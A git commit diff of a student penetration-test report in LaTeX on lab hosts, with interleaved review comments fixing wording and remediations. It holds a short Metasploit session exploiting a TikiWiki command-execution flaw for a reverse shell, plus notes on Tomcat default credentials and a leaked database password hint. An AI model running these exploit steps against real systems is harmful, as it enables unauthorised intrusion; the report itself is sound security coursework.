author: mo khan <mo@mokhan.ca> 2016-02-17 18:13:59 -0700
committer: mo khan <mo@mokhan.ca> 2016-02-17 18:13:59 -0700
commit: 81ecebb0bb032e6925029330197620ded206abc0
tree: 22e26e4f4ee98abd888593070c070ba2b3aeed2f
parent: 9330f1764949a39deffd04552d4532760c9c62c7
add \newpage and missing summaries.
-rw-r--r-- report/template.tex 76
1 files changed, 36 insertions, 40 deletions
diff --git a/report/template.tex b/report/template.tex
index 8febbe0..d357f70 100644
--- a/report/template.tex
+++ b/report/template.tex
@@ -63,6 +63,8 @@ The scope of the assessment included penetration testing against the below syste
\item ultimatelamp.sait230.ca (10.2.1.3)
\end{itemize}
+The focus of the assessment was against vulnerable web applications and databases.
+
\subsection{Methodology}
The following methodology was used:
@@ -134,6 +136,7 @@ recommendations to remediate the issues identified.
Medium & Vulnerable Wordpress Spreadsheet Plugin. & Disable vulnerable plugin or upgrade. \\ \hline
High & Default Tomcat Installation & Change default tomcat installation. \\ \hline
High & PHPMyAdmin root Access & Secure access to phpMyAdmin. \\ \hline
+ High & Tikiwiki command execution flaw & Command execution flaw allows users to run arbitrary code within the target host. \\ \hline
\hline
\end{tabular}
\end{center}
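Review bot: the third column of this table is the remediation (compare "Disable vulnerable plugin or upgrade." and "Secure access to phpMyAdmin." in the rows above), but the new Tikiwiki row puts a description of the flaw there instead. Replace it with the fix, for example "Upgrade TikiWiki to a release without the tiki-graph\_formula.php flaw, or remove that page." (note the underscore must be escaped inside a LaTeX tabular).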
@@ -507,8 +510,15 @@ Next I logged in to the wordpress site.
\newpage
\section{Default Tomcat Installation}
+\begin{description}
+ \item[Severity] High
+ \item[Impact] Start/Stop existing applications and/or upload malicious applications which can lead to full system compromise.
+ \item[Affected Resources/System] http://metasploitable.sait230.ca/wordpress
+ \item[Summary] The Tomcat installation on this host is allows for remote access using the default installation credentials.
+\end{description}
+
\paragraph{Apache Tomcat}
-In the nikto scan we saw that the metasploitable box was using a default Apache
+In the nikto scan I saw that the metasploitable box was using a default Apache
Tomcat installation:
\begin{lstlisting}
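Review bot: the Affected Resources/System entry points at http://metasploitable.sait230.ca/wordpress, which is the WordPress finding's target, not Tomcat's; the nmap output later in this file lists Tomcat on 8180/tcp, so the affected resource should be the Tomcat manager on that port of metasploitable.sait230.ca. Also, in the Summary line "is allows for remote access" should read "allows remote access".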
@@ -564,7 +574,8 @@ ability to run shell commands on this host.
\begin{enumerate}
\item Change the default credentials for the Tomcat account.
- \item Restrict access to the Tomcat manager.
+ \item Restrict access to the Tomcat manager by firewall rules.
+ \item Ensure only HTTPS access to the Tomcat manager.
\end{enumerate}
\paragraph{References}
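Review bot: "Ensure only HTTPS access to the Tomcat manager" protects the credentials in transit but does nothing against a login with the default credentials, which is the finding; it is a hardening step that belongs after items 1 and 2. Consider adding "remove the manager application if it is not needed" as its own item, since the Impact line above says the manager can be used to upload applications that lead to full compromise.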
@@ -629,45 +640,21 @@ databases, export databases, import databases as well as many other functions.
\item[Severity] High
\item[Impact] www-data level access to full system.
\item[Affected Resources/System] http://ultimatelamp.sait230.ca/tikiwiki/
- \item[Summary] Tikiwiki command execution flaw
+ \item[Summary] Tikiwiki command execution flaw allows users to run arbitrary code within the target host.
\end{description}
\paragraph{Tikiwiki}
-\begin{lstlisting}[language=Bash,basicstyle=\tiny]
-msf > search tikiwiki
-[-] Warning: database not connected or cache not built, falling back to slow search
-
-Matching Modules
-================
+The version of tikiwiki running on ultimatelamp.sait230.ca has a command execution
+flaw in the tiki-graph\_formula.php page. This vulnerability can be used to
+gain system level access to the host.
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki Information Disclosure
- exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
- exploit/unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent TikiWiki tiki-graph_formula Remote PHP Code Execution
- exploit/unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent TikiWiki jhot Remote Command Execution
- exploit/unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent Tiki Wiki <= 8.3 unserialize() PHP Code Execution
+Metasploit has a module that can be used to gain access to the host via
+a reverse meterpreter shell. Below is a meterpreter session detailing
+how I was able to gain a shell on the ultimatelamp.sait230.ca host
+\begin{lstlisting}[language=Bash,basicstyle=\tiny]
msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec
-msf exploit(tikiwiki_graph_formula_exec) > show options
-
-Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):
-
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST yes The target address
- RPORT 80 yes The target port
- URI /tikiwiki yes TikiWiki directory path
- VHOST no HTTP server virtual host
-
-
-Exploit target:
-
- Id Name
- -- ----
- 0 Automatic
-
msf exploit(tikiwiki_graph_formula_exec) > set RHOST ultimatelamp.sait230.ca
RHOST => ultimatelamp.sait230.ca
msf exploit(tikiwiki_graph_formula_exec) > exploit
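Review bot: the new prose says the flaw "can be used to gain system level access to the host", but the Impact line a few lines above says "www-data level access", and the module is described as remote PHP code execution, so code runs as the web server user; say "access as the www-data user" and treat escalation as a separate step. Dropping the "show options" output also removes the only record that URI was left at its default of /tikiwiki; either keep that listing or add an explicit "set URI /tikiwiki" line so the transcript can be reproduced, and since the text now promises "a reverse meterpreter shell", the payload that was set should appear in the session as well.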
@@ -822,6 +809,7 @@ Service detection performed. Please report any incorrect results at https://nmap
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
\end{lstlisting}
+\newpage
\subsection{metasploitable.sait230.ca}
\begin{lstlisting}[language=bash]
@@ -853,7 +841,7 @@ PORT STATE SERVICE VERSION
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
-\end{lstlistring}
+\end{lstlisting}
I chose to spider the metasploitable website to analyze the full site locally
to try to identify and information leakage in the website.
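Review bot: the \end{lstlistring} fix is correct; while in this hunk, the unchanged context line "to try to identify and information leakage" should read "to try to identify any information leakage".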
@@ -869,14 +857,15 @@ on the downloaded source to try to find some keywords like password.
\$ grep -rn password metasploitable.sait230.ca/
\end{lstlisting}
-Here's one snippet that i discovered:
+Here's one snippet that I discovered:
\begin{lstlisting}[language=bash]
metasploitable.sait230.ca/mutillidae/index.php?do=toggle-security&page=user-info.php:2: \
<!-- I think the database password is set to blank or perhaps samurai.
\end{lstlisting}
-The above text shows then a client side html comment was left in the code that hints at a possible password for the database.
+The above text shows then a client side HTML comment was left in the code that hints
+at a possible password for the database.
Another example:
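Review bot: the reflowed sentence still reads "The above text shows then a client side HTML comment"; it should be "shows that a client-side HTML comment was left in the code".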
@@ -886,12 +875,12 @@ It is ok to put the password in HTML comments because no user will ever see
\end{lstlisting}
The above statement is incorrect. Serverside comments will be rendered on the server
-and will be ommitted by most templating engines when producing html. However, it will
-not strip out html comments. Html comments can be easily viewed by all browsers. Passwords
+and will be ommitted by most templating engines when producing HTML\@. However, it will
+not strip out HTML comments. HTML comments can be easily viewed by all browsers. Passwords
and information that gives away details about the backend system should never be
writtin in a code comment.
-Next, I opened up the file metasploitable.sait230.ca/mutillidae/index.php and
+Next, I opened up the file metasploitable.sait230.ca/mutillidae/index.php and
found the following code comment at the top of the HTML document.
\begin{lstlisting}[language=HTML]
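Review bot: the reflow keeps two typos, "ommitted" (omitted) on the changed line and "writtin" (written) in the context line below it. "Serverside comments will be rendered on the server" is also imprecise: server-side comments are processed on the server and dropped from the output, which is exactly the contrast with HTML comments this paragraph is drawing, so "processed on the server and omitted from the HTML it produces" states the point. The L142/L143 pair differs only in trailing whitespace and can be dropped from the patch.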
@@ -907,6 +896,7 @@ just making all this up. -->
"http://www.w3.org/TR/19 99/REC-html401-19991224/loose.dtd">
\end{lstlisting}
+\newpage
\subsection{bwa.sait230.ca}
\begin{lstlisting}[language=bash]
@@ -930,6 +920,7 @@ Nmap done: 1 IP address (1 host up) scanned in 11.26 seconds
\end{lstlisting}
+\newpage
\subsection{tomcat-apache.sait230.ca}
\begin{lstlisting}[language=bash]
@@ -950,6 +941,7 @@ Service detection performed. Please report any incorrect results at http://nmap.
Nmap done: 1 IP address (1 host up) scanned in 12.27 seconds
\end{lstlisting}
+\newpage
\subsection{ultimatelamp.sait230.ca}
\begin{lstlisting}[language=bash]
@@ -978,6 +970,7 @@ Web Application vulnerabilities discovered
\csvautotabular{discovery-webapp.csv}
+\newpage
\subsection{Vulnerabilities for bwa.sait230.ca}
nikto scan:
@@ -1021,6 +1014,7 @@ root@bt-was:/pentest/web/nikto# ./nikto.pl -host bwa.sait230.ca -p 80
+ 1 host(s) tested
\end{lstlisting}
+\newpage
\subsection{Vulnerabilities for metasploitable.sait230.ca}
nikto scan:
@@ -1106,6 +1100,7 @@ The results from the nessus scan are below:
\label{fig:directory-listing}
\end{figure}
+\newpage
\subsection{Vulnerabilities for tomcat-apache.sait230.ca}
nikto scan:
@@ -1163,6 +1158,7 @@ The results from the nessus scan are below:
\label{fig:nessus-tomcat}
\end{figure}
+\newpage
\subsection{Vulnerabilities for ultimatelamp.sait230.ca}
nikto scan: